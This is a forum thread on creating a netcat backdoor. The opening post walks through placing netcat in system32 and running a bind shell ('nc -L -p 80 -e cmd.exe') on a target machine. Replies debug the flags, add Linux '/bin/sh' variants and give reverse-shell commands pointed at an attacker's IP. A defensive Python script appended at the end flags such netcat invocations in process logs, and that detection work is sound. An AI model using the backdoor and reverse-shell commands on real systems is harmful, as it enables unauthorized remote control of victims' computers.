Creating a backdoor with nc and connecting to it
  • undead
    Posts: 822
    Creating a backdoor with nc and connecting to it

    First you must download NetCat from the following website:
    http://www.downloadnetcat.com

    After you download netcat, place it in system32.

    Now open command line and write this command inside:

    nc -v -L -p 80 -e cmd.exe

    -v is verbose
    -L is to make it listen
    -p is the port you want to listen to.
    -e is the program you want to launch when the connection is established

    Now on the attacking computer open command line and write this command:

    nc -v <IP of the target> 80

    Now you have access to the computer.
  • Never tried it before. I'm gonna try it later. Thanks for the guide.

    EDIT: It says -L is not an option for netcat (on Linux)
  • undead
    Posts: 822
    It's for windows.
  • said:


    It's for windows.



    Damn. If I put it in the system32 of a windows machine and connect via Linux machine would it work?
  • undead
    Posts: 822
    Hm.. I didn't try it. Try it and tell us. :) But if you want for linux maybe that should work: nc -v -l -p 80 -e /bin/sh
  • Xin
    Posts: 3,251
    The windows version is bad, use it on linux, also you have to portforward for this to work
    Xin
  • said:


    Hm.. I didn't try it. Try it and tell us. :) But if you want for linux maybe that should work: nc -v -l -p 80 -e /bin/sh



    I tried that exact command but it said -l is not a parameter for netcat.
  • undead
    Posts: 822
    Are you sure you tried "l"? "L" and "l" are different.
  • said:


    Are you sure you tried "l"? "L" and "l" are different.



    Yep tried lowercase and uppercase.
    Input:
    ~$ nc -v -L -p 80 -e /bin/sh


    Output:

    nc: invalid option -- 'L'
    usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
    [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
    [-x proxy_address[:port]] [hostname] [port[s]]


    Edit: I've been messing around with it and researching it. I've found that some people got it to work on Unix machines by using this command:
    nc -nvv -l -p -e /bin/sh <port of choice>

    But when I do it on my machine I get an output saying cannot use -p and -l

    I'm going to continue seeing what I can do with it.

    Edit2: Here's what I got to work (on Windows). I put netcat in system32, and ran this command in a batch file:
    nc -l -p 1337 -e cmd.exe

    After that I went onto my Linux machine and just connected via netcat and it opened a connection to the command prompt on the Windows system. I'm going to continue trying to get it to work on Linux. I'm trying to attack it to /bin/sh but so far I can't get it to work because of some errors saying I can't use -l and -p together etc.
  • alix10
    Posts: 73
    wtf its that easy, im going to try it
  • undead
    Posts: 822
    Did you try it? Did it work for you?
  • dR.sqL
    Posts: 23
    Not working for me mate.. ! :(
  • zer0day
    Posts: 33
    Like an earlier poster said, if your vic doesn't have their port forwarded you won't be able to connect. That's the benefit of other tools that have reverse connection. Windows egress lets it all out, but ingress is filtered.
  • Xin
    Posts: 3,251
    Yeah, you can use this for webservers on open ports, but I would just use a reverse shell; that means you open your port and they connect to you.
    Xin
  • Sh3llc0d3
    Posts: 1,910
    said:


    NOT WORKING :( how to do this :(



    It should work. I see no problems with the commands.

    Where are you getting stuck?
  • m0rph
    Posts: 332
    netcat can do reverse shells. granted it has to be on the victim machine:

    nc -nv <your ip> <your port> -e (cmd, or shell command)


    you have to listen with:

    nc -lvnp <desired port>
    while( !(succeed = try() ) );
  • gizmodo
    Posts: 8
    Have you guys checked cryptcat? http://sourceforge.net/projects/cryptcat/
  • nu11byte
    Posts: 53
    You also need to portforward for this to work. If you don't port forward, it will just listen and never connect.
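
Seen from the defending side, the invocations quoted in this thread (`-l`/`-L` with `-e`, and a connect with `-e`) are easy to flag in process-creation logs. The following is an added example, not code from any poster: the sample command lines are constructed, and the `NC_NAMES` list and the `classify`/`scan` helpers are assumptions made for illustration.

```python
import shlex

# Constructed process-creation command lines for the demo (not real telemetry).
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\nc.exe -v -L -p 80 -e cmd.exe",
    "nc -nv 192.0.2.10 4444 -e /bin/sh",
    "nc -lvnp 4444",
    "nc -v 192.0.2.20 80",
    "rsync -e ssh src dst",
]

# Binary names treated as netcat variants (assumed list; extend for your estate).
NC_NAMES = {"nc", "ncat", "netcat", "cryptcat"}


def classify(cmdline):
    """Label one command line: 'bind-shell', 'reverse-shell', 'listener' or None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes
    except ValueError:                            # unbalanced quotes
        argv = cmdline.split()
    if not argv:
        return None
    exe = argv[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe not in NC_NAMES:
        return None
    flags = set()
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--"):
            flags.update(arg[1:])                 # expands clusters such as -lvnp
    listening = bool(flags & {"l", "L"})          # -l / -L as used in the thread
    executes = "e" in flags                       # -e attaches a program to the socket
    if executes:
        return "bind-shell" if listening else "reverse-shell"
    return "listener" if listening else None


def scan(cmdlines):
    """Return (label, cmdline) pairs for every flagged command line."""
    return [(label, c) for c in cmdlines if (label := classify(c))]


if __name__ == "__main__":
    for label, cmd in scan(SAMPLE_CMDLINES):
        print(f"{label:14} {cmd}")
```

Matching on the binary name alone misses renamed copies, so pair this with a check for unexpected executables in system32 and for `cmd.exe` or `/bin/sh` processes whose parent holds a network socket.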